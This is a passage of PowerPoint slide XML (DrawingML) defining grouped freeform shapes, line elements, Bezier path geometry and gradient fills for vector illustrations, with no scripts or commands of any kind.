            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2866" y="59"/>
                <a:ext cx="295" cy="217"/>
                <a:chOff x="3744" y="572"/>
                <a:chExt cx="295" cy="217"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="113" name="Freeform 13002"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3744" y="572"/>
                  <a:ext cx="295" cy="217"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1354"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1354"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1354"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1354"/>
                    <a:gd name="T11" fmla="*/ 796 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1354"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="990"/>
                      </a:lnTo>
                      <a:close/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4" name="Line 13003"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3764" y="648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Line 13004"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3800" y="639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Line 13005"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3835" y="629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Line 13006"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3871" y="619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Line 13007"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3907" y="609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Line 13008"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3942" y="599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0" name="Line 13009"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3978" y="589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" name="Line 13010"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4015" y="579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" name="Line 13011"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="593"/>
                  <a:ext cx="294" cy="80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Line 13012"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="618"/>
                  <a:ext cx="294" cy="80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Line 13013"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="644"/>
                  <a:ext cx="294" cy="79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Line 13014"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3744" y="669"/>
                  <a:ext cx="294" cy="80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6" name="Line 13015"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3744" y="694"/>
                  <a:ext cx="294" cy="80"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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78" name="Line 16694"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipV="1">
              <a:off x="7675300" y="1954419"/>
              <a:ext cx="0" cy="17938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pic>
          <p:nvPicPr>
            <p:cNvPr id="179" name="Picture 16696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gray">
            <a:xfrm>
              <a:off x="7548300" y="1792494"/>
              <a:ext cx="255588" cy="16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0" name="Group 2278"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5237530" y="3224235"/>
              <a:ext cx="642938" cy="192087"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="181" name="Freeform 2279"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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2" name="Freeform 2280"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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3" name="Freeform 2281"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134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4" name="Freeform 2282"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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85" name="Freeform 2788"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3891991" y="1937753"/>
              <a:ext cx="2063750" cy="555625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4C7013">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="4C7013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86" name="Group 4887"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4755591" y="1574215"/>
              <a:ext cx="217488" cy="379413"/>
              <a:chOff x="5106" y="-110"/>
              <a:chExt cx="2483" cy="4351"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="187" name="Freeform 4888"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5590" y="996"/>
                <a:ext cx="97" cy="3245"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 41"/>
                  <a:gd name="T1" fmla="*/ 0 h 1374"/>
                  <a:gd name="T2" fmla="*/ 0 w 41"/>
                  <a:gd name="T3" fmla="*/ 1365 h 1374"/>
                  <a:gd name="T4" fmla="*/ 0 w 41"/>
                  <a:gd name="T5" fmla="*/ 1365 h 1374"/>
                  <a:gd name="T6" fmla="*/ 20 w 41"/>
                  <a:gd name="T7" fmla="*/ 1374 h 1374"/>
                  <a:gd name="T8" fmla="*/ 41 w 41"/>
                  <a:gd name="T9" fmla="*/ 1365 h 1374"/>
                  <a:gd name="T10" fmla="*/ 41 w 41"/>
                  <a:gd name="T11" fmla="*/ 0 h 1374"/>
                  <a:gd name="T12" fmla="*/ 0 w 41"/>
                  <a:gd name="T13" fmla="*/ 0 h 13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1"/>
                  <a:gd name="T22" fmla="*/ 0 h 1374"/>
                  <a:gd name="T23" fmla="*/ 41 w 41"/>
                  <a:gd name="T24" fmla="*/ 1374 h 137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1" h="1374">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1365"/>
                      <a:pt x="0" y="1365"/>
                      <a:pt x="0" y="1365"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1365"/>
                      <a:pt x="0" y="1365"/>
                      <a:pt x="0" y="1365"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1370"/>
                      <a:pt x="9" y="1374"/>
                      <a:pt x="20" y="1374"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="1374"/>
                      <a:pt x="41" y="1370"/>
                      <a:pt x="41" y="1365"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="41" y="0"/>
                      <a:pt x="4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8" name="Freeform 4889"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5191" y="218"/>
                <a:ext cx="751" cy="806"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 255 w 318"/>
                  <a:gd name="T1" fmla="*/ 91 h 341"/>
                  <a:gd name="T2" fmla="*/ 94 w 318"/>
                  <a:gd name="T3" fmla="*/ 7 h 341"/>
                  <a:gd name="T4" fmla="*/ 88 w 318"/>
                  <a:gd name="T5" fmla="*/ 8 h 341"/>
                  <a:gd name="T6" fmla="*/ 87 w 318"/>
                  <a:gd name="T7" fmla="*/ 8 h 341"/>
                  <a:gd name="T8" fmla="*/ 87 w 318"/>
                  <a:gd name="T9" fmla="*/ 8 h 341"/>
                  <a:gd name="T10" fmla="*/ 53 w 318"/>
                  <a:gd name="T11" fmla="*/ 23 h 341"/>
                  <a:gd name="T12" fmla="*/ 64 w 318"/>
                  <a:gd name="T13" fmla="*/ 236 h 341"/>
                  <a:gd name="T14" fmla="*/ 258 w 318"/>
                  <a:gd name="T15" fmla="*/ 309 h 341"/>
                  <a:gd name="T16" fmla="*/ 266 w 318"/>
                  <a:gd name="T17" fmla="*/ 304 h 341"/>
                  <a:gd name="T18" fmla="*/ 255 w 318"/>
                  <a:gd name="T19" fmla="*/ 91 h 3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18"/>
                  <a:gd name="T31" fmla="*/ 0 h 341"/>
                  <a:gd name="T32" fmla="*/ 318 w 318"/>
                  <a:gd name="T33" fmla="*/ 341 h 3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18" h="341">
                    <a:moveTo>
                      <a:pt x="255" y="91"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="31"/>
                      <a:pt x="145" y="0"/>
                      <a:pt x="94" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="7"/>
                      <a:pt x="90" y="8"/>
                      <a:pt x="88" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="8"/>
                      <a:pt x="87" y="8"/>
                      <a:pt x="87" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="8"/>
                      <a:pt x="87" y="8"/>
                      <a:pt x="87" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="11"/>
                      <a:pt x="63" y="16"/>
                      <a:pt x="53" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="64"/>
                      <a:pt x="5" y="159"/>
                      <a:pt x="64" y="236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="310"/>
                      <a:pt x="205" y="341"/>
                      <a:pt x="258" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261" y="307"/>
                      <a:pt x="263" y="306"/>
                      <a:pt x="266" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="318" y="264"/>
                      <a:pt x="313" y="169"/>
                      <a:pt x="255" y="91"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="80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9" name="Freeform 4890"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5106" y="240"/>
                <a:ext cx="751" cy="805"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 254 w 318"/>
                  <a:gd name="T1" fmla="*/ 91 h 341"/>
                  <a:gd name="T2" fmla="*/ 93 w 318"/>
                  <a:gd name="T3" fmla="*/ 7 h 341"/>
                  <a:gd name="T4" fmla="*/ 87 w 318"/>
                  <a:gd name="T5" fmla="*/ 8 h 341"/>
                  <a:gd name="T6" fmla="*/ 86 w 318"/>
                  <a:gd name="T7" fmla="*/ 8 h 341"/>
                  <a:gd name="T8" fmla="*/ 86 w 318"/>
                  <a:gd name="T9" fmla="*/ 8 h 341"/>
                  <a:gd name="T10" fmla="*/ 52 w 318"/>
                  <a:gd name="T11" fmla="*/ 23 h 341"/>
                  <a:gd name="T12" fmla="*/ 63 w 318"/>
                  <a:gd name="T13" fmla="*/ 236 h 341"/>
                  <a:gd name="T14" fmla="*/ 258 w 318"/>
                  <a:gd name="T15" fmla="*/ 309 h 341"/>
                  <a:gd name="T16" fmla="*/ 265 w 318"/>
                  <a:gd name="T17" fmla="*/ 304 h 341"/>
                  <a:gd name="T18" fmla="*/ 254 w 318"/>
                  <a:gd name="T19" fmla="*/ 91 h 3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18"/>
                  <a:gd name="T31" fmla="*/ 0 h 341"/>
                  <a:gd name="T32" fmla="*/ 318 w 318"/>
                  <a:gd name="T33" fmla="*/ 341 h 3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18" h="341">
                    <a:moveTo>
                      <a:pt x="254" y="91"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="31"/>
                      <a:pt x="144" y="0"/>
                      <a:pt x="93" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="7"/>
                      <a:pt x="89" y="8"/>
                      <a:pt x="87" y="8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74" y="11"/>
                      <a:pt x="62" y="16"/>
                      <a:pt x="52" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="63"/>
                      <a:pt x="4" y="159"/>
                      <a:pt x="63" y="236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="310"/>
                      <a:pt x="204" y="341"/>
                      <a:pt x="258" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="260" y="307"/>
                      <a:pt x="263" y="306"/>
                      <a:pt x="265" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="318" y="264"/>
                      <a:pt x="313" y="168"/>
                      <a:pt x="254" y="91"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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0" name="Freeform 4891"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7033" y="-110"/>
                <a:ext cx="556" cy="525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 197 w 235"/>
                  <a:gd name="T1" fmla="*/ 56 h 222"/>
                  <a:gd name="T2" fmla="*/ 96 w 235"/>
                  <a:gd name="T3" fmla="*/ 8 h 222"/>
                  <a:gd name="T4" fmla="*/ 0 w 235"/>
                  <a:gd name="T5" fmla="*/ 25 h 222"/>
                  <a:gd name="T6" fmla="*/ 86 w 235"/>
                  <a:gd name="T7" fmla="*/ 81 h 222"/>
                  <a:gd name="T8" fmla="*/ 96 w 235"/>
                  <a:gd name="T9" fmla="*/ 222 h 222"/>
                  <a:gd name="T10" fmla="*/ 189 w 235"/>
                  <a:gd name="T11" fmla="*/ 188 h 222"/>
                  <a:gd name="T12" fmla="*/ 193 w 235"/>
                  <a:gd name="T13" fmla="*/ 187 h 222"/>
                  <a:gd name="T14" fmla="*/ 193 w 235"/>
                  <a:gd name="T15" fmla="*/ 187 h 222"/>
                  <a:gd name="T16" fmla="*/ 204 w 235"/>
                  <a:gd name="T17" fmla="*/ 180 h 222"/>
                  <a:gd name="T18" fmla="*/ 197 w 235"/>
                  <a:gd name="T19" fmla="*/ 56 h 2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35"/>
                  <a:gd name="T31" fmla="*/ 0 h 222"/>
                  <a:gd name="T32" fmla="*/ 235 w 235"/>
                  <a:gd name="T33" fmla="*/ 222 h 22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35" h="222">
                    <a:moveTo>
                      <a:pt x="197" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="18"/>
                      <a:pt x="127" y="0"/>
                      <a:pt x="96" y="8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9" y="29"/>
                      <a:pt x="62" y="49"/>
                      <a:pt x="86" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="132"/>
                      <a:pt x="128" y="194"/>
                      <a:pt x="96" y="222"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="188"/>
                      <a:pt x="189" y="188"/>
                      <a:pt x="189" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="187"/>
                      <a:pt x="192" y="187"/>
                      <a:pt x="193" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="187"/>
                      <a:pt x="193" y="187"/>
                      <a:pt x="193" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="185"/>
                      <a:pt x="200" y="183"/>
                      <a:pt x="204" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="157"/>
                      <a:pt x="232" y="101"/>
                      <a:pt x="197" y="56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1" name="Freeform 4892"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5413" y="157"/>
                <a:ext cx="864" cy="794"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 318 w 366"/>
                  <a:gd name="T1" fmla="*/ 78 h 336"/>
                  <a:gd name="T2" fmla="*/ 271 w 366"/>
                  <a:gd name="T3" fmla="*/ 32 h 336"/>
                  <a:gd name="T4" fmla="*/ 188 w 366"/>
                  <a:gd name="T5" fmla="*/ 0 h 336"/>
                  <a:gd name="T6" fmla="*/ 145 w 366"/>
                  <a:gd name="T7" fmla="*/ 7 h 336"/>
                  <a:gd name="T8" fmla="*/ 0 w 366"/>
                  <a:gd name="T9" fmla="*/ 33 h 336"/>
                  <a:gd name="T10" fmla="*/ 101 w 366"/>
                  <a:gd name="T11" fmla="*/ 61 h 336"/>
                  <a:gd name="T12" fmla="*/ 161 w 366"/>
                  <a:gd name="T13" fmla="*/ 117 h 336"/>
                  <a:gd name="T14" fmla="*/ 206 w 366"/>
                  <a:gd name="T15" fmla="*/ 271 h 336"/>
                  <a:gd name="T16" fmla="*/ 172 w 366"/>
                  <a:gd name="T17" fmla="*/ 330 h 336"/>
                  <a:gd name="T18" fmla="*/ 164 w 366"/>
                  <a:gd name="T19" fmla="*/ 335 h 336"/>
                  <a:gd name="T20" fmla="*/ 165 w 366"/>
                  <a:gd name="T21" fmla="*/ 336 h 336"/>
                  <a:gd name="T22" fmla="*/ 288 w 366"/>
                  <a:gd name="T23" fmla="*/ 291 h 336"/>
                  <a:gd name="T24" fmla="*/ 326 w 366"/>
                  <a:gd name="T25" fmla="*/ 277 h 336"/>
                  <a:gd name="T26" fmla="*/ 328 w 366"/>
                  <a:gd name="T27" fmla="*/ 275 h 336"/>
                  <a:gd name="T28" fmla="*/ 361 w 366"/>
                  <a:gd name="T29" fmla="*/ 213 h 336"/>
                  <a:gd name="T30" fmla="*/ 318 w 366"/>
                  <a:gd name="T31" fmla="*/ 78 h 3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66"/>
                  <a:gd name="T49" fmla="*/ 0 h 336"/>
                  <a:gd name="T50" fmla="*/ 366 w 366"/>
                  <a:gd name="T51" fmla="*/ 336 h 3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66" h="336">
                    <a:moveTo>
                      <a:pt x="318" y="78"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="304" y="60"/>
                      <a:pt x="288" y="44"/>
                      <a:pt x="271" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="12"/>
                      <a:pt x="215" y="1"/>
                      <a:pt x="188" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="7"/>
                      <a:pt x="145" y="7"/>
                      <a:pt x="145" y="7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31" y="28"/>
                      <a:pt x="67" y="39"/>
                      <a:pt x="101" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="75"/>
                      <a:pt x="143" y="94"/>
                      <a:pt x="161" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="199" y="167"/>
                      <a:pt x="214" y="225"/>
                      <a:pt x="206" y="271"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="295"/>
                      <a:pt x="190" y="316"/>
                      <a:pt x="172" y="330"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="332"/>
                      <a:pt x="167" y="333"/>
                      <a:pt x="164" y="335"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="336"/>
                      <a:pt x="165" y="336"/>
                      <a:pt x="165" y="336"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="288" y="291"/>
                      <a:pt x="288" y="291"/>
                      <a:pt x="288" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="326" y="277"/>
                      <a:pt x="326" y="277"/>
                      <a:pt x="326" y="277"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="327" y="277"/>
                      <a:pt x="327" y="276"/>
                      <a:pt x="328" y="275"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="261"/>
                      <a:pt x="358" y="239"/>
                      <a:pt x="361" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="366" y="172"/>
                      <a:pt x="351" y="122"/>
                      <a:pt x="318" y="78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2" name="Freeform 4893"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
